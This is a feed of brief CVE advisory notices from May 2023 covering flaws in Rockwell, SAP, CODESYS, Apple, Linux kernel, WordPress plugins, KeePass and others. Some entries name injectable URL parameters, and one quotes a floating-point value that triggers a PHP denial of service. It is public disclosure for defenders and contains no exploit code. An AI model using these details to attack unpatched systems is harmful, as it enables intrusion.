🚨 CVE-2023-29024A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.🎖@cveNotify |
|
| 2023-05-15 18:58:26 |
🚨 CVE-2023-29025A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:25 |
🚨 CVE-2023-29026A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:23 |
🚨 CVE-2023-29022A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:22 |
🚨 CVE-2021-31240An issue found in libming v.0.4.8 allows a local attacker to execute arbitrary code via the parseSWF_IMPORTASSETS function in the parser.c file.🎖@cveNotify |
|
| 2023-05-15 18:58:20 |
🚨 CVE-2023-30334AsmBB v2.9.1 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the MiniMag.asm and bbcode.asm libraries.🎖@cveNotify |
|
| 2023-05-15 18:58:19 |
🚨 CVE-2023-30744In SAP AS NetWeaver JAVA - versions SERVERCORE 7.50, J2EE-FRMW 7.50, CORE-TOOLS 7.50, an unauthenticated attacker can attach to an open interface and make use of an open naming and directory API to instantiate an object which has methods which can be called without further authorization and authentication. A subsequent call to one of these methods can read or change the state of existing services without any effect on availability.🎖@cveNotify |
|
| 2023-05-15 18:58:18 |
🚨 CVE-2023-31404Under certain conditions, SAP BusinessObjects Business Intelligence Platform (Central Management Service) - versions 420, 430, allows an attacker to access information which would otherwise be restricted. Some users with specific privileges could have access to credentials of other users. It could let them access data sources which would otherwise be restricted.🎖@cveNotify |
|
| 2023-05-15 18:58:16 |
🚨 CVE-2023-31406Due to insufficient input validation, SAP BusinessObjects Business Intelligence Platform - versions 420, 430, allows an unauthenticated attacker to redirect users to untrusted site using a malicious link. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-05-15 18:58:15 |
🚨 CVE-2023-31407SAP Business Planning and Consolidation - versions 740, 750, allows an authorized attacker to upload a malicious file, resulting in Cross-Site Scripting vulnerability. After successful exploitation, an attacker can cause limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-05-15 18:58:14 |
🚨 CVE-2023-32111In SAP PowerDesigner (Proxy) - version 16.7, an attacker can send a crafted request from a remote host to the proxy machine and crash the proxy server, due to faulty implementation of memory management causing a memory corruption. This leads to a high impact on availability of the application.🎖@cveNotify |
|
| 2023-05-15 18:58:13 |
🚨 CVE-2023-32112Vendor Master Hierarchy - versions SAP_APPL 500, SAP_APPL 600, SAP_APPL 602, SAP_APPL 603, SAP_APPL 604, SAP_APPL 605, SAP_APPL 606, SAP_APPL 616, SAP_APPL 617, SAP_APPL 618, S4CORE 100, does not perform necessary authorization checks for an authenticated user to access some of its function. This could lead to modification of data impacting the integrity of the system.🎖@cveNotify |
|
| 2023-05-15 16:58:32 |
🚨 CVE-2023-27969A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3, watchOS 9.4, tvOS 16.4, iOS 15.7.4 and iPadOS 15.7.4, iOS 16.4 and iPadOS 16.4. An app may be able to execute arbitrary code with kernel privileges🎖@cveNotify |
|
| 2023-05-15 16:58:31 |
🚨 CVE-2023-31609An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:30 |
🚨 CVE-2023-31616An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:26 |
🚨 CVE-2023-31617An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:25 |
🚨 CVE-2023-31619An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:24 |
🚨 CVE-2023-31621An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:20 |
🚨 CVE-2023-31623An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:19 |
🚨 CVE-2023-31625An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:18 |
🚨 CVE-2023-31626An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:15 |
🚨 CVE-2023-31627An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:14 |
🚨 CVE-2023-31629An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 16:58:13 |
🚨 CVE-2023-31631An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-15 15:58:21 |
🚨 CVE-2023-29862An issue found in Agasio-Camera device version not specified allows a remote attacker to execute arbitrary code via the check and authLevel parameters.🎖@cveNotify |
|
| 2023-05-15 15:58:20 |
🚨 CVE-2023-2009Plugin does not sanitize and escape the URL field in the Pretty Url WordPress plugin through 1.5.4 settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-05-15 15:58:19 |
🚨 CVE-2023-2179The WooCommerce Order Status Change Notifier WordPress plugin through 1.1.0 does not have authorisation and CSRF when updating status orders via an AJAX action available to any authenticated users, which could allow low privilege users such as subscriber to update arbitrary order status, making them paid without actually paying for them for example🎖@cveNotify |
|
| 2023-05-15 15:58:17 |
🚨 CVE-2023-2180The KIWIZ Invoices Certification & PDF System WordPress plugin through 2.1.3 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/downlaod arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)🎖@cveNotify |
|
| 2023-05-15 15:58:16 |
🚨 CVE-2023-31842Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/index.php?page=edit_faculty&id=.🎖@cveNotify |
|
| 2023-05-15 15:58:15 |
🚨 CVE-2023-31843Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/view_faculty.php?id=.🎖@cveNotify |
|
| 2023-05-15 15:58:13 |
🚨 CVE-2023-31844Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_subject.php?id=.🎖@cveNotify |
|
| 2023-05-15 13:58:41 |
🚨 CVE-2022-47392An authenticated, remote attacker may use a improper input validation vulnerability in the CmpApp/CmpAppBP/CmpAppForce Components of multiple CODESYS products in multiple versions to read from an invalid address which can lead to a denial-of-service condition.🎖@cveNotify |
|
| 2023-05-15 13:58:39 |
🚨 CVE-2023-31408Cleartext Storage of Sensitive Information in SICK FTMg AIR FLOW SENSOR withPartnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows a remoteattacker to potentially steal user credentials that are stored in the user’s browsers local storage viacross-site-scripting attacks.🎖@cveNotify |
|
| 2023-05-15 13:58:38 |
🚨 CVE-2023-31409Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an remote attacker to influence the availability of the webserver by invocing a Slowloris style attack via HTTP requests.🎖@cveNotify |
|
| 2023-05-15 13:58:37 |
🚨 CVE-2022-47383An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:36 |
🚨 CVE-2022-47384An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:32 |
🚨 CVE-2022-47387An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:31 |
🚨 CVE-2022-47390An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:30 |
🚨 CVE-2022-47937** UNSUPPORTED WHEN ASSIGNED ** Improper input validation in the Apache Sling Commons JSON bundle allows an attacker to trigger unexpected errors by supplying specially-crafted input.NOTE: This vulnerability only affects products that are no longer supported by the maintainerThe org.apache.sling.commons.json bundle has been deprecated as of March 2017 and should not be used anymore. Consumers are encouraged to consider the Apache Sling Commons Johnzon OSGi bundle provided by the Apache Sling project, but may of course use other JSON libraries.🎖@cveNotify |
|
| 2023-05-15 13:58:29 |
🚨 CVE-2022-47380An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:28 |
🚨 CVE-2022-22508Improper Input Validation vulnerability in multiple CODESYS V3 products allows an authenticated remote attacker to block consecutive logins of a specific type.🎖@cveNotify |
|
| 2023-05-15 13:58:24 |
🚨 CVE-2022-47378Multiple CODESYS products in multiple versions are prone to a improper input validation vulnerability. An authenticated remote attacker may craft specific requests that use the vulnerability leading to a denial-of-service condition.🎖@cveNotify |
|
| 2023-05-15 13:58:23 |
🚨 CVE-2022-47379An authenticated, remote attacker may use a out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into memory which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:22 |
🚨 CVE-2022-47386An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:21 |
🚨 CVE-2022-47382An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:16 |
🚨 CVE-2022-47385An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpAppForce Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:15 |
🚨 CVE-2022-47391In multiple CODESYS products in multiple versions an unauthorized, remote attacker may use a improper input validation vulnerability to read from invalid addresses leading to a denial of service.🎖@cveNotify |
|
| 2023-05-15 13:58:14 |
🚨 CVE-2022-47389An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.🎖@cveNotify |
|
| 2023-05-15 13:58:13 |
🚨 CVE-2022-4048Inadequate Encryption Strength in CODESYS Development System V3 versions prior to V3.5.18.40 allows an unauthenticated local attacker to access and manipulate code of the encrypted boot application.🎖@cveNotify |
|
| 2023-05-15 10:58:19 |
🚨 CVE-2023-1698In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.🎖@cveNotify |
|
| 2023-05-15 10:58:18 |
🚨 CVE-2023-32784In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.🎖@cveNotify |
|
| 2023-05-15 10:58:17 |
🚨 CVE-2023-2591Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitHub repository nilsteampassnet/teampass prior to 3.0.7.🎖@cveNotify |
|
| 2023-05-15 10:58:16 |
🚨 CVE-2020-12069In CODESYS V3 products in all versions prior V3.5.16.0 containing the CmpUserMgr, the CODESYS Control runtime system stores the online communication passwords using a weak hashing algorithm. This can be used by a local attacker with low privileges to gain full control of the device.🎖@cveNotify |
|
| 2023-05-15 05:58:34 |
🚨 CVE-2023-32758giturlparse (aka git-url-parse) through 1.2.2, as used in Semgrep through 1.21.0, is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing untrusted URLs. This might be relevant if Semgrep is analyzing an untrusted package (for example, to check whether it accesses any Git repository at an http:// URL), and that package's author placed a ReDoS attack payload in a URL used by the package.🎖@cveNotify |
|
| 2023-05-15 05:58:33 |
🚨 CVE-2023-27783An issue found in TCPreplay tcprewrite v.4.4.3 allows a remote attacker to cause a denial of service via the tcpedit_dlt_cleanup function at plugins/dlt_plugins.c.🎖@cveNotify |
|
| 2023-05-15 05:58:32 |
🚨 CVE-2023-27784An issue found in TCPReplay v.4.4.3 allows a remote attacker to cause a denial of service via the read_hexstring function at the utils.c:309 endpoint.🎖@cveNotify |
|
| 2023-05-15 05:58:31 |
🚨 CVE-2023-27785An issue found in TCPreplay TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse endpoints function.🎖@cveNotify |
|
| 2023-05-15 05:58:30 |
🚨 CVE-2023-27786An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the macinstring function.🎖@cveNotify |
|
| 2023-05-15 05:58:25 |
🚨 CVE-2023-27787An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse_list function at the list.c:81 endpoint.🎖@cveNotify |
|
| 2023-05-15 05:58:24 |
🚨 CVE-2023-27788An issue found in TCPrewrite v.4.4.3 allows a remote attacker to cause a denial of service via the ports2PORT function at the portmap.c:69 endpoint.🎖@cveNotify |
|
| 2023-05-15 05:58:23 |
🚨 CVE-2023-24838HGiga PowerStation has a vulnerability of Information Leakage. An unauthenticated remote attacker can exploit this vulnerability to obtain the administrator's credential. This credential can then be used to login PowerStation or Secure Shell to achieve remote code execution.🎖@cveNotify |
|
| 2023-05-15 05:58:22 |
🚨 CVE-2010-4645strtod.c, as used in the zend_strtod function in PHP 5.2 before 5.2.17 and 5.3 before 5.3.5, and other products, allows context-dependent attackers to cause a denial of service (infinite loop) via a certain floating-point value in scientific notation, which is not properly handled in x87 FPU registers, as demonstrated using 2.2250738585072011e-308.🎖@cveNotify |
|
| 2023-05-14 15:58:23 |
🚨 CVE-2023-2699A vulnerability, which was classified as critical, has been found in SourceCodester Lost and Found Information System 1.0. Affected by this issue is some unknown functionality of the file admin/?page=items/view_item of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228980.🎖@cveNotify |
|
| 2023-05-14 12:58:24 |
🚨 CVE-2023-2696A vulnerability was found in SourceCodester Online Exam System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /matkul/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228977 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-14 12:58:23 |
🚨 CVE-2023-2694A vulnerability was found in SourceCodester Online Exam System 1.0. It has been classified as critical. This affects an unknown part of the file /dosen/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228975.🎖@cveNotify |
|
| 2023-05-14 10:58:26 |
🚨 CVE-2023-2691A vulnerability, which was classified as problematic, was found in SourceCodester Personnel Property Equipment System 1.0. Affected is an unknown function of the file admin/add_item.php of the component POST Parameter Handler. The manipulation of the argument item_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228972.🎖@cveNotify |
|
| 2023-05-14 10:58:25 |
🚨 CVE-2023-2693A vulnerability was found in SourceCodester Online Exam System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /mahasiswa/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228974 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-14 10:58:24 |
🚨 CVE-2023-2690A vulnerability, which was classified as critical, has been found in SourceCodester Personnel Property Equipment System 1.0. This issue affects some unknown processing of the file admin/returned_reuse_form.php of the component GET Parameter Handler. The manipulation of the argument client_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228971.🎖@cveNotify |
|
| 2023-05-14 06:58:28 |
🚨 CVE-2023-2269A denial of service problem was found, due to a possible recursive locking scenario, resulting in a deadlock in table_clear in drivers/md/dm-ioctl.c in the Linux Kernel Device Mapper-Multipathing sub-component.🎖@cveNotify |
|
| 2023-05-14 06:58:27 |
🚨 CVE-2020-27813An integer overflow vulnerability exists with the length of websocket frames received via a websocket connection. An attacker would use this flaw to cause a denial of service attack on an HTTP Server allowing websocket connections.🎖@cveNotify |
|
| 2023-05-14 06:58:26 |
🚨 CVE-2023-32233In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.🎖@cveNotify |
|
| 2023-05-14 06:58:25 |
🚨 CVE-2023-31436qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.🎖@cveNotify |
|
| 2023-05-14 06:58:24 |
🚨 CVE-2023-0386A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-13 05:58:36 |
🚨 CVE-2023-27951The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An archive may be able to bypass Gatekeeper🎖@cveNotify |
|
| 2023-05-13 05:58:35 |
🚨 CVE-2023-27952A race condition was addressed with improved locking. This issue is fixed in macOS Ventura 13.3. An app may bypass Gatekeeper checks🎖@cveNotify |
|
| 2023-05-13 05:58:34 |
🚨 CVE-2023-27933The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, watchOS 9.4, tvOS 16.4, iOS 16.4 and iPadOS 16.4. An app with root privileges may be able to execute arbitrary code with kernel privileges🎖@cveNotify |
|
| 2023-05-13 05:58:33 |
🚨 CVE-2023-27932This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, watchOS 9.4, tvOS 16.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. Processing maliciously crafted web content may bypass Same Origin Policy🎖@cveNotify |
|
| 2023-05-13 05:58:32 |
🚨 CVE-2023-27945This issue was addressed with improved entitlements. This issue is fixed in Xcode 14.3. A sandboxed app may be able to collect system logs🎖@cveNotify |
|
| 2023-05-13 05:58:31 |
🚨 CVE-2023-28180A denial-of-service issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. A user in a privileged network position may be able to cause a denial-of-service🎖@cveNotify |
|
| 2023-05-13 05:58:27 |
🚨 CVE-2023-27944This issue was addressed with a new entitlement. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An app may be able to break out of its sandbox🎖@cveNotify |
|
| 2023-05-13 05:58:26 |
🚨 CVE-2023-28181The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. An app may be able to execute arbitrary code with kernel privileges🎖@cveNotify |
|
| 2023-05-13 05:58:25 |
🚨 CVE-2023-28190A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data🎖@cveNotify |
|
| 2023-05-13 05:58:24 |
🚨 CVE-2023-28200A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Big Sur 11.7.5. An app may be able to disclose kernel memory🎖@cveNotify |
|
| 2023-05-13 05:58:23 |
🚨 CVE-2023-28192A permissions issue was addressed with improved validation. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-05-13 05:58:19 |
🚨 CVE-2023-28189The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3. An app may be able to view sensitive information🎖@cveNotify |
|
| 2023-05-13 05:58:18 |
🚨 CVE-2023-27958The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. A remote user may be able to cause unexpected system termination or corrupt kernel memory🎖@cveNotify |
|
| 2023-05-13 05:58:17 |
🚨 CVE-2023-27946An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Big Sur 11.7.5. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-05-13 05:58:16 |
🚨 CVE-2023-27949An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-05-12 22:58:30 |
🚨 CVE-2023-20877VMware Aria Operations contains a privilege escalation vulnerability. An authenticated malicious user with ReadOnly privileges can perform code execution leading to privilege escalation.🎖@cveNotify |
|
| 2023-05-12 22:58:29 |
🚨 CVE-2023-20878VMware Aria Operations contains a deserialization vulnerability. A malicious actor with administrative privileges can execute arbitrary commands and disrupt the system.🎖@cveNotify |
|
| 2023-05-12 22:58:26 |
🚨 CVE-2023-20879VMware Aria Operations contains a Local privilege escalation vulnerability. A malicious actor with administrative privileges in the Aria Operations application can gain root access to the underlying operating system.🎖@cveNotify |
|
| 2023-05-12 22:58:25 |
🚨 CVE-2023-25005A maliciously crafted DLL file can be forced to read beyond allocated boundaries in Autodesk InfraWorks 2023, and 2021 when parsing the DLL files could lead to a resource injection vulnerability.🎖@cveNotify |
|
| 2023-05-12 22:58:24 |
🚨 CVE-2023-25006A malicious actor may convince a user to open a malicious USD file that may trigger a use-after-free vulnerability which could result in code execution.🎖@cveNotify |
|
| 2023-05-12 22:58:23 |
🚨 CVE-2023-25007A malicious actor may convince a user to open a malicious USD file that may trigger an uninitialized pointer which could result in code execution.🎖@cveNotify |
|
| 2023-05-12 22:58:19 |
🚨 CVE-2023-25009A malicious actor may convince a user to open a malicious USD file that may trigger an out-of-bounds write vulnerability which could result in code execution.🎖@cveNotify |
|
| 2023-05-12 22:58:18 |
🚨 CVE-2023-2181An issue has been discovered in GitLab affecting all versions before 15.9.8, 15.10.0 before 15.10.7, and 15.11.0 before 15.11.3. A malicious developer could use a git feature called refs/replace to smuggle content into a merge request which would not be visible during review in the UI.🎖@cveNotify |
|
| 2023-05-12 22:58:17 |
🚨 CVE-2023-32303Planet is software that provides satellite data. The secret file stores the user's Planet API authentication information. It should only be accessible by the user, but before version 2.0.1, its permissions allowed the user's group and non-group to read the file as well. This issue was patched in version 2.0.1. As a workaround, set the secret file permissions to only user read/write by hand.🎖@cveNotify |
|
| 2023-05-12 22:58:14 |
🚨 CVE-2023-28762SAP BusinessObjects Business Intelligence Platform - versions 420, 430, allows an authenticated attacker with administrator privileges to get the login token of any logged-in BI user over the network without any user interaction. The attacker can impersonate any user on the platform resulting into accessing and modifying data. The attacker can also make the system partially or entirely unavailable.🎖@cveNotify |
|
| 2023-05-12 22:58:13 |
🚨 CVE-2023-29188SAP CRM WebClient UI - versions SAPSCORE 129, S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. After successful exploitation, an attacker with user level access can read and modify some sensitive information but cannot delete the data.🎖@cveNotify |
|
| 2023-05-12 22:58:12 |
🚨 CVE-2023-31181WJJ Software - InnoKB Server, InnoKB/Console 2.2.1 - CWE-22: Path Traversal🎖@cveNotify |
|
| 2023-05-12 20:58:43 |
🚨 CVE-2023-1094MonicaHQ version 4.0.0 allows an authenticated remote attacker to execute malicious code in the application via CSTI in the `people:id/food` endpoint and food parameter.🎖@cveNotify |
|
| 2023-05-12 20:58:42 |
🚨 CVE-2023-27863IBM Spectrum Protect Plus Server 10.1.13, under specific configurations, could allow an elevated user to obtain SMB credentials that may be used to access vSnap data stores. IBM X-Force ID: 249325.🎖@cveNotify |
|
| 2023-05-12 20:58:40 |
🚨 CVE-2023-30247File Upload vulnerability found in Oretnom23 Storage Unit Rental Management System v.1.0 allows a remote attacker to execute arbitrary code via the update_settings parameter.🎖@cveNotify |
|
| 2023-05-12 20:58:39 |
🚨 CVE-2023-32305aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged functions called by the aiven-extras extension. A low privileged user can create objects that collide with existing function names, which will then be executed instead. Exploiting this vulnerability could allow a low privileged user to acquire `superuser` privileges, which would allow full, unrestricted access to all data and database functions. And could lead to arbitrary code execution or data access on the underlying host as the `postgres` user. The issue has been patched as of version 1.1.9.🎖@cveNotify |
|
| 2023-05-12 20:58:38 |
🚨 CVE-2023-32306Time Tracker is an open source time tracking system. A time-based blind injection vulnerability existed in Time Tracker reports in versions prior to 1.22.13.5792. This was happening because the `reports.php` page was not validating all parameters in POST requests. Because some parameters were not checked, it was possible to craft POST requests with malicious SQL for Time Tracker database. This issue is fixed in version 1.22.13.5792. As a workaround, use the fixed code in `ttReportHelper.class.php` from version 1.22.13.5792.🎖@cveNotify |
|
| 2023-05-12 20:58:36 |
🚨 CVE-2023-27957A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-05-12 20:58:34 |
🚨 CVE-2023-27931This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. An app may be able to access user-sensitive data🎖@cveNotify |
|
| 2023-05-12 20:58:33 |
🚨 CVE-2023-27943This issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4. Files downloaded from the internet may not have the quarantine flag applied🎖@cveNotify |
|
| 2023-05-12 20:58:31 |
🚨 CVE-2023-27954The issue was addressed by removing origin information. This issue is fixed in macOS Ventura 13.3, watchOS 9.4, tvOS 16.4, iOS 15.7.4 and iPadOS 15.7.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A website may be able to track sensitive user information🎖@cveNotify |
|
| 2023-05-12 20:58:30 |
🚨 CVE-2023-27929An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. Processing a maliciously crafted image may result in disclosure of process memory🎖@cveNotify |
|
| 2023-05-12 20:58:28 |
🚨 CVE-2023-27953The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. A remote user may be able to cause unexpected system termination or corrupt kernel memory🎖@cveNotify |
|
| 2023-05-12 20:58:27 |
